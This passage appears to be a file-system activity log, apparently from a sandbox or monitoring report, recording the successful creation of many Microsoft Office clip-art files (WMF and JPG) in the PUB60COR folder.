Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182902.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182946.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0183172.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0183174.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0183198.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0183574.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185670.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185774.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185776.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185778.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185780.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185786.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185790.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185796.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185798.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185800.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185806.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185818.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185828.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185834.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185842.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0186346.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0186360.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0186362.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0186364.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187647.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187815.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187817.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187819.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187825.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187829.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187835.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187837.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187839.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187847.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187849.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187851.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187859.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187861.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187863.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187881.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187883.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187893.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187895.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187921.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188511.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188513.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188519.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188587.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188667.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188669.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188679.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195248.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195254.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195260.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195320.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195342.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195428.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195772.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195788.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196060.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196110.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196142.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196354.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196358.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196364.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0197979.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0197983.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198016.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198020.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198021.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198022.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198025.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198102.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198113.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198226.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198234.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198372.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198377.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198447.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198494.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198712.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199279.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199303.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199307.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199423.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199429.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199465.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199469.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199473.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199475.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199483.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199609.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200151.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200163.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200183.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200189.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200273.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200279.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200289.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200377.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200383.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200467.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200521.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200611.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0202045.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0211981.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0212299.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0212601.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0212685.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0212751.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0212953.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0213243.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0213449.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0214934.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0214948.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0215070.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0215076.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0215210.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0215709.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0215710.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0215718.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216112.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216153.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216540.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216570.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216600.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216612.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216874.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0217262.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0217302.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0217872.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0227419.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0227558.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0228823.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0228959.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0230553.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0230558.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0232171.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0232393.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0232395.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0232795.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0232797.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0232803.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0233512.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0233665.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0233992.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0234000.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0234001.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0234376.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0237225.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0237228.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0237336.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0237759.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
